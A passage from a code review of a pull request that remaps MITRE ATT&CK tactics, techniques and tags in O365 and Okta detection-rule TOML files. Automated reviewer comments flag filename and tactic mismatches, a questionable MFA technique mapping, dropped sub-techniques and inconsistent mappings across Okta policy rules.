"https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
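Review bot: After the threat hunk the rule's first tactic is Defense Evasion, but the file is still named `privilege_escalation_exchange_new_or_modified_federation_domain.toml` and nothing in this patch renames it. If the repository enforces a filename prefix matching the primary (first) tactic — I believe it does for Elastic-authored rules, but confirm — the same mismatch arises at L467 (Persistence is now listed first in `privilege_escalation_sharepoint_site_collection_admin_added.toml`), L472, L473 and L476 (`credential_access_*` rules whose only tactic becomes Defense Evasion), L483 (`defense_evasion_*` moved to Initial Access) and L484 (`impact_*` moved to Defense Evasion). Either rename those files in this patch or, if a later patch in the series does it, say so in the description so the intermediate state is understood.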
diff --git a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml index e354d1a2bfa..8d34ebf4f65 100644 --- a/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml +++ b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/02" integration = ["o365"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -87,34 +87,36 @@ event.dataset:o365.audit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index a7c2689ef36..a138eaf5c54 100644 
--- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,12 +65,7 @@ references = [ risk_score = 73 rule_id = "3805c3dc-f82c-4f8d-891e-63c24d3102b0" severity = "high" -tags = [ - "Data Source: Okta", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -81,14 +76,36 @@ event.dataset:okta.system and event.action:user.mfa.attempt_bypass [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1111" -name = "Multi-Factor Authentication Interception" -reference = "https://attack.mitre.org/techniques/T1111/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
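Review bot: T1556.006 may not describe what the query in the threat hunk's header matches: the rule still keys on `event.action:user.mfa.attempt_bypass`, which, as the event name suggests, records an authentication attempt that tried to get past the factor requirement, whereas T1556.006 (Modify Authentication Process: Multi-Factor Authentication) covers disabling or altering the MFA mechanism itself. The removed T1111 mapping and the new one therefore describe different adversary behaviour, and the new mapping is additionally duplicated under Defense Evasion. If the remapping is deliberate, a sentence in the PR description explaining why this Okta event fits T1556.006 would let reviewers check it against the event semantics rather than guess.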
diff --git a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml index 0c7a8ec869e..fb5b188fca0 100644 --- a/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml +++ b/rules/integrations/okta/credential_access_attempts_to_brute_force_okta_user_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] @@ -79,17 +79,21 @@ event.dataset:okta.system and event.action:user.account.lock [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["okta.actor.alternate_id"] value = 3 diff --git a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml index 032c715eb49..607e0c6f2f3 100644 --- a/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml +++ b/rules/integrations/okta/credential_access_multiple_auth_events_from_single_device_behind_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/10" integration = ["okta"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -92,32 +92,16 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.threshold] field = ["okta.debug_context.debug_data.dt_hash"] value = 1 diff --git a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml index 03486d8b6ad..f68c3fed768 100644 --- a/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml +++ b/rules/integrations/okta/credential_access_multiple_device_token_hashes_for_single_okta_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/08" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
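Review bot: Only the parent T1110 survives this hunk: both sub-techniques (T1110.003 Password Spraying and T1110.004 Credential Stuffing) go away along with the duplicated `[[rule.threat.technique]]` block, whereas the sibling device-token-hash rule at L474 fixes the same duplication by keeping one T1110 block and nesting both `[[rule.threat.technique.subtechnique]]` entries under it. Unless the loss of specificity is intended, the L474 shape should be used here too so the two rules advertise the same coverage.
```toml
[[rule.threat.technique]]
id = "T1110"
name = "Brute Force"
reference = "https://attack.mitre.org/techniques/T1110/"

[[rule.threat.technique.subtechnique]]
id = "T1110.003"
name = "Password Spraying"
reference = "https://attack.mitre.org/techniques/T1110/003/"

[[rule.threat.technique.subtechnique]]
id = "T1110.004"
name = "Credential Stuffing"
reference = "https://attack.mitre.org/techniques/T1110/004/"

# … unchanged: [rule.threat.tactic] and [rule.threshold] …
```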
@@ -66,13 +66,7 @@ setup = """## Setup The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.""" severity = "medium" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Domain: SaaS", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Okta", "Domain: SaaS", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -107,14 +101,31 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1539" name = "Steal Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1539/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index 208243ef930..aaf6412175c 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/22" integration = ["okta"] maturity = "production" -updated_date = "2025/10/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -55,14 +55,7 @@ same dt_hash. This will help identify the nature of the anomaly. risk_score = 73 rule_id = "fb3ca230-af4e-11f0-900d-f661ea17fbcc" severity = "high" -tags = [ - "Domain: Identity", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" -] +tags = ["Domain: Identity", "Tactic: Defense Evasion", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -79,17 +72,21 @@ data_stream.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 463bd891fd3..48def95c88b 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/26" integration = ["okta"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -81,15 +81,7 @@ references = [ risk_score = 73 rule_id = "9ed5d08f-aad6-4c03-838c-d686da887c2c" severity = "high" -tags = [ - "Domain: Identity", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Tactic: Credential Access", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -159,22 +151,30 @@ FROM logs-okta.system-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" @@ -184,4 +184,3 @@ reference = "https://attack.mitre.org/techniques/T1550/004/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - 
diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml index a27b743a262..82d4bcc65fb 100644 --- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml +++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,29 +113,23 @@ from logs-okta* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" [[rule.threat.technique.subtechnique]] id = "T1110.004" name = "Credential Stuffing" reference = "https://attack.mitre.org/techniques/T1110/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml index 72b54d82017..2f24bf1da20 100644 --- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml +++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["okta"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,14 +122,18 @@ FROM logs-okta.system-* METADATA _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml index eef4992bb6a..9b00e895d4f 100644 --- a/rules/integrations/okta/credential_access_user_impersonation_access.toml +++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml @@ -2,7 +2,7 @@ creation_date = "2022/03/22" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,12 +58,7 @@ references = [ risk_score = 73 rule_id = "cdbebdc1-dc97-43c6-a538-f26a20c0a911" severity = "high" -tags = [ - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Data Source: Okta", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -75,8 +70,17 @@ event.dataset:okta.system and event.action:user.session.impersonation.initiate [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml index 5291da1293e..78efb62e5d5 100644 --- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,13 @@ event.dataset:okta.system and event.action:zone.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml index 7f1bcaf2c10..038fb4e5f17 100644 
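Review bot: The network-zone hunk removes the T1562.007 (Disable or Modify Cloud Firewall) sub-technique and leaves the parent T1562 with nothing in its place; the zone-delete hunk at L477 does the same. Dropping a sub-technique reduces the precision of the ATT&CK coverage these rules claim, so the reason it no longer fits (presumably that an Okta network zone is not being treated as a cloud firewall) belongs in the PR description, where the next person auditing coverage will look for it.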
--- a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml +++ b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,13 @@ event.dataset:okta.system and event.action:zone.delete [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml index c2ae0981e52..4c597f990c3 100644 --- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml +++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -62,14 +62,7 @@ references = [ risk_score = 47 rule_id = "6649e656-6f85-11ef-8876-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: SaaS", - "Data Source: Okta", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -88,22 +81,39 @@ event.dataset: okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.display_name"] diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml index afb56b6df29..8494737858f 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,19 +88,13 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml index 497da81d4d9..f67bcff4ab9 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,19 +87,13 @@ event.dataset:okta.system and event.action:policy.rule.deactivate [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
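Review bot: The six Okta policy rules leave this patch with three different technique mappings for one object lifecycle: `policy.lifecycle.deactivate` (first threat hunk here), `policy.rule.delete` and `policy.lifecycle.update` (L481) and `policy.rule.update` (L482) move to T1484 with no sub-technique, `policy.rule.deactivate` (second threat hunk here) keeps T1562 alone after losing T1562.007, and `policy.lifecycle.delete` (L480) gains T1556.009 plus T1562. Deactivating and deleting a policy have the same effect on what Okta enforces, so a reader of the rule set will expect the same mapping on both. Pick one mapping for the policy lifecycle events and one for the rule events, or state in each rule's description why they differ.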
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml index d15fdf5794f..823db9f42f6 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/28" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,19 +88,23 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml index 5b253b86daa..7bafae062cb 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -87,19 +87,13 @@ event.dataset:okta.system and event.action:policy.rule.delete [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml index 2be46aca15c..ab57bdc871e 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,19 +76,13 @@ event.dataset:okta.system and event.action:policy.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml index b163bbcf480..d06439bd616 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,19 +85,13 @@ event.dataset:okta.system and event.action:policy.rule.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or 